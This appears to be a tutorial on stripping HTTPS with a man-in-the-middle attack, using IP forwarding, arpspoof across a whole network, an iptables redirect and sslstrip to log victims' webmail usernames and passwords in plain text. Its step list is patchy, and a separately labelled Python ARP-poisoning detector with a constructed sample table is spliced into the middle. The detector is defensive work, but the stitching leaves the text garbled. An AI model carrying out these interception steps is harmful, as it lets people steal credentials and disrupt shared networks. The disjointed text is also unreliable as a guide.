Some people ask "Are you sure SSL (Secure Sockets Layer) on port 443 can be hacked so that we
learn the password sent over the network?" How do you break SSL protection using sslstrip?
What is SSL?
Actually, if you read my explanation about SSL in my previous post, when we try to break
the encryption it is rather hard to break, but in this tutorial I will explain how to break
the SSL encryption without breaking the SSL encryption, using a man-in-the-middle attack :-).
1. KALI LINUX
2. Arpspoof
3. IPTables
4. SSLStrip
5. NetStat
1. Set up your Linux box so it can forward every incoming packet (enable IP forwarding).
This lets your Linux/BackTrack machine forward packets that were not intended for your
machine.
netstat -nr
a. Change "eth0" to the network card that is currently connected to the network. Usually it
is eth0 or wlan0.
c. In this tutorial I use arpspoof against the entire network. Be careful if your network has a large
user base connected to it, because it will crash your network and bring it down.
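The arpspoof step here and in the man-in-the-middle lesson earlier both rewrite the victims' ARP tables, and that is what a defender can look for. As an added example (not part of the tutorial or of the arpspoof/sslstrip tools), the following reads a neighbour table in /proc/net/arp format and flags one MAC answering for several IPs, or the gateway's MAC differing from a known-good value. The sample table is constructed; a shared MAC can also be legitimate (a router with several addresses, VM NAT), so treat a finding as a lead to check, not as proof.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Set, Tuple


class ArpEntry(NamedTuple):
    ip: str
    mac: str
    device: str


# One line of /proc/net/arp: IP, HW type, flags, MAC, mask, device.
ARP_LINE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+0x[0-9a-f]+\s+(?P<flags>0x[0-9a-f]+)\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+\S+\s+(?P<dev>\S+)$",
    re.IGNORECASE,
)


def parse_proc_net_arp(text: str) -> List[ArpEntry]:
    """Parse the neighbour table; incomplete entries (flags 0x0) are skipped."""
    entries: List[ArpEntry] = []
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m and int(m.group("flags"), 16) != 0:
            entries.append(ArpEntry(m.group("ip"), m.group("mac").lower(), m.group("dev")))
    return entries


def _ip_key(ip: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in ip.split("."))


def find_arp_anomalies(entries: List[ArpEntry], gateway_ip: str,
                       known_gateway_mac: Optional[str] = None) -> List[str]:
    """Human-readable findings; an empty list means nothing looked poisoned."""
    findings: List[str] = []
    ips_by_mac: Dict[str, Set[str]] = defaultdict(set)
    for e in entries:
        ips_by_mac[e.mac].add(e.ip)
    # Symptom 1: one hardware address claiming several IPs (a spoofing host
    # answers for the gateway as well as for itself).
    for mac in sorted(ips_by_mac):
        ips = ips_by_mac[mac]
        if len(ips) > 1:
            tag = " (includes the gateway)" if gateway_ip in ips else ""
            findings.append(f"MAC {mac} answers for {len(ips)} IPs: "
                            f"{', '.join(sorted(ips, key=_ip_key))}{tag}")
    # Symptom 2: the gateway no longer resolves to the MAC recorded earlier.
    gateway_macs = {e.mac for e in entries if e.ip == gateway_ip}
    if known_gateway_mac and gateway_macs and known_gateway_mac.lower() not in gateway_macs:
        findings.append(f"gateway {gateway_ip} now resolves to "
                        f"{', '.join(sorted(gateway_macs))}, expected {known_gateway_mac.lower()}")
    return findings


# Constructed sample: a victim's table after its gateway entry has been poisoned.
# .1 (gateway) and .20 (the spoofing host) share a MAC; .30 is an unrelated host;
# .40 is an incomplete entry that the parser must ignore.
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:dd:ee:20     *        eth0
192.168.1.20     0x1         0x2         aa:bb:cc:dd:ee:20     *        eth0
192.168.1.30     0x1         0x2         aa:bb:cc:dd:ee:30     *        eth0
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        eth0
"""
```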
SSL Strip
SSL Strip was created by Moxie Marlinspike, who gave a demonstration of the HTTPS stripping
attacks presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch
for HTTPS links and redirects, then map those links into either look-alike HTTP links or
homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock
icon, selective logging, and session denial. -Taken from the author's website-
This all happens on the fly and is practically invisible to users. The only way to notice is by
checking the URL in the address bar: where it would normally display HTTPS, it will now
display HTTP instead.
3. cd sslstrip-0.9
1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080 to
ensure our outgoing connections (from SSL Strip) get routed to the proper port.
2. After setting up iptables, the next step is to redirect all network HTTP traffic through
our computer using arpspoof (don't forget to enable IP forwarding).
sslstrip -l 8080
SSL Strip is now running and waiting for the victim to open an SSL URL such as
https://mail.google.com, https://mail.yahoo.com, etc.
As the victim, I will try to open https://mail.live.com. When I open the page, I expect the URL to
no longer be protected by SSL.
4. After SSL Strip has captured enough data, to stop arpspoof and SSL Strip just hit CTRL + C. After
you stop them, the whole network will be down and inaccessible for a while (it shouldn't take
long); this happens because arpspoof doesn't automatically repopulate the ARP tables with the
router's proper MAC address.
5. Inside the SSL Strip folder there will be a new file, "sslstrip.log", that stores all the
information captured over HTTP and even HTTPS. Just take a look at the file using your favorite
text editor. The picture below shows the content of my sslstrip.log, which captured the victim's
data when they opened https://mail.live.com.
You can see the username and password in plain text there in the log.
1. If you are on a public network (internet cafe, unsecured hotspot, etc.), minimize logging in to your
personal accounts.